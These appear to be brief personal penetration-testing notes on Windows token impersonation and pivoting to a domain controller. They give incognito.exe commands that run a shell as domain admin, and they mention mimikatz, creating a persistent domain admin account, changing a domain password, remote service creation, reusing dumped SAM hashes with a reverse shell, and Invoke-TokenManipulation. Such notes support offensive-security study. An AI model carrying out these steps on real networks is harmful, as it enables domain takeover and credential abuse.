Impersonating token & pivot

need elevated admin

incognito impersonate

.\incognito.exe list_tokens -u (find domain\admin delegation token)
.\incognito.exe execute -c "domain\admin" .\shell.exe

>> with domain admin shell, pivot to DC

mimikatz impersonate

pivoting

Create domain admin account as a DC admin / admin on DC ser so that no need the actual DC admin creds for persistence,

or change password net user adminuser pass123! /domain

smb (with dc user/admin creds)

sc pivot (smb) - DC admin

create service on the remote ser and start

query, stop, start, delete, and add system services

powershell - DC admin

alt

CME with local admin hash (from HKLM SAM SYS :LMHASH) to impersonate domain admin for accessing dc with rev.ps1

DC Admin impersonation (not yet pivot)

alt

Invoke-TokenManipulation.ps1 (not yet pivot)

Last updated